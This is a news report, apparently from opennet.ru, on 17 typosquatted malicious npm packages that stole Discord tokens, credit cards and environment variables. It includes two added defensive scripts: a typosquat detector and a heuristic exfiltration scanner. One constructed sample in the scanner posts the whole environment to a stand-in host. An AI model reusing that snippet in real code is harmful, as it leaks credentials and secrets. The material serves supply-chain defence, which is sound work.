17 malicious packages found in NPM repository

The NPM repository identified 17 malicious packages that were distributed using typosquatting, i.e. by giving the packages names similar to those of popular libraries, in the expectation that a user will make a typo when typing the name or will not notice the difference when choosing a module from a list.
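As an added example (not code from the article or from the NPM project), the following Node.js check flags dependencies in a package.json whose names are one typo away from a well-known package after normalising case, scope prefix and separators. The allow-list of popular names and the sample dependency map are constructed for the example. Note that this rule only catches look-alikes produced by a typo; names that merely reuse a popular prefix, like the discord-* packages described in the article, need a separate policy.

```javascript
// Added example, not the repository's or the article's code: flag dependencies whose
// names are one typo away from a well-known package, the lure that typosquatting relies on.

// Short, constructed allow-list of well-known names; a real check would use a larger list.
const POPULAR = ['discord.js', 'lodash', 'express', 'react', 'axios', 'chalk'];

// Optimal-string-alignment edit distance: insertions, deletions, substitutions and
// adjacent transpositions each cost 1, which covers the common kinds of typo.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Collapse the differences a reader tends to overlook: scope prefix, case, separators.
function normalize(name) {
  return name.replace(/^@[^/]+\//, '').toLowerCase().replace(/[-_.]/g, '');
}

// Returns one finding per dependency that is not an exact well-known name but whose
// normalised form lies within maxDistance edits of one.
function findTyposquats(dependencies, popular = POPULAR, maxDistance = 1) {
  const findings = [];
  for (const dep of Object.keys(dependencies)) {
    if (popular.includes(dep)) continue; // the genuine package
    let best = null;
    for (const p of popular) {
      const distance = editDistance(normalize(dep), normalize(p));
      if (distance <= maxDistance && (best === null || distance < best.distance)) {
        best = { name: dep, resembles: p, distance };
      }
    }
    if (best) findings.push(best);
  }
  return findings;
}

// Constructed package.json dependency map: three look-alikes among genuine names.
const SAMPLE_DEPENDENCIES = {
  'lodahs': '^4.17.0',    // transposed letters
  'expres': '^4.18.0',    // dropped letter
  'discordjs': '^14.0.0', // separator removed
  'react': '^18.0.0',     // genuine
  'left-pad': '^1.3.0',   // genuine, unrelated name
};

console.log(findTyposquats(SAMPLE_DEPENDENCIES));
```

Run it as `node check-typosquats.js`; to use it on a real project, replace `SAMPLE_DEPENDENCIES` with the `dependencies` object read from package.json and widen `POPULAR` to the packages your organisation actually depends on.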

The discord-selfbot-v14, discord-lofy, discordsystem, and discord-vilao packages used a modified version of the legitimate discord.js library, which provides functions for interacting with the Discord API. The malicious components were integrated into one of the package files and amounted to about 4000 lines of code, obfuscated by variable name mangling, string encryption, and deliberately broken code formatting. The code scanned the local file system for Discord tokens and, if any were found, sent them to the attackers' server.

The fix-error package was advertised as fixing bugs in the Discord selfbot, but included the PirateStealer trojan, which steals credit card numbers and accounts associated with Discord. The malicious component was activated by injecting JavaScript code into the Discord client.

The prerequests-xcode package included a Trojan for remote access to the user's system, based on the DiscordRAT Python application.

It is speculated that the attackers wanted access to Discord servers in order to deploy botnet control points, to use them as a proxy for retrieving data from compromised systems, to obscure the origin of attacks, to distribute malware to Discord users, or to resell premium accounts.

The packages wafer-bind, wafer-autocomplete, wafer-beacon, wafer-caas, wafer-toggle, wafer-geolocation, wafer-image, wafer-form, wafer-lightbox, octavius-public and mrg-message-broker included code that sent out the contents of environment variables, which can contain, for example, access keys, tokens, or passwords for continuous integration systems or cloud environments such as AWS.
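As an added example (not code from the article or from any of the packages it names), the following heuristic scan looks for the pattern just described: source that reads the environment as a whole object (rather than a single named variable) and also uses an outbound-network API. The file contents below are constructed samples, and the regular expressions are a deliberately simple approximation that a reviewer would tune for their own codebase.

```javascript
// Added example, not the article's code: a heuristic scan for package source that reads
// the whole environment and also talks to the network, the pattern described for the
// wafer-* packages. All file contents below are constructed samples.

// Matches process.env used as a whole object (JSON.stringify(process.env),
// Object.keys(process.env)) but not a single named variable such as
// process.env.PORT or process.env['HOME'].
const WHOLE_ENV = /\bprocess\.env\b(?![.\[])/;

// Matches common outbound-network APIs in Node.js code.
const NETWORK = /\bhttps?\.(?:request|get)\b|\bfetch\s*\(|\baxios\b|\bnet\.connect\b|\bnew\s+WebSocket\b/;

// Classifies one source file: 'high' = whole-env read plus a network call,
// 'medium' = whole-env read only, 'none' otherwise.
function classifySource(text) {
  const readsWholeEnv = WHOLE_ENV.test(text);
  const usesNetwork = NETWORK.test(text);
  let severity = 'none';
  if (readsWholeEnv && usesNetwork) severity = 'high';
  else if (readsWholeEnv) severity = 'medium';
  return { readsWholeEnv, usesNetwork, severity };
}

// Scans a map of { path: contents } and returns only the files worth a human look,
// highest severity first.
function scanPackage(files) {
  const rank = { high: 0, medium: 1 };
  const findings = [];
  for (const [path, text] of Object.entries(files)) {
    const result = classifySource(text);
    if (result.severity !== 'none') findings.push({ path, ...result });
  }
  return findings.sort((a, b) => rank[a.severity] - rank[b.severity]);
}

// Constructed sample package: one benign file, one exfiltrating file, one borderline file.
const SAMPLE_FILES = {
  // Benign: reads a single named variable and serves HTTP; no whole-env access.
  'lib/server.js': `const http = require('http');
const port = process.env.PORT || 3000;
http.createServer((req, res) => res.end('ok')).listen(port);`,
  // Suspicious: serialises the entire environment and posts it to a remote host.
  'lib/index.js': `const https = require('https');
const payload = JSON.stringify(process.env);
const req = https.request({ host: 'collector.invalid', method: 'POST', path: '/' });
req.end(payload);`,
  // Borderline: enumerates the environment but does not send it anywhere.
  'lib/debug.js': `module.exports = () => Object.keys(process.env).sort();`,
};

console.log(scanPackage(SAMPLE_FILES));
```

A real run would feed `scanPackage` the contents of every `.js` file under `node_modules/<package>` before the package is allowed into a CI image; a 'medium' finding is common in legitimate tooling (debug dumps, config loaders), whereas a 'high' finding in a small utility package deserves a manual read of the file.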

Source: opennet.ru
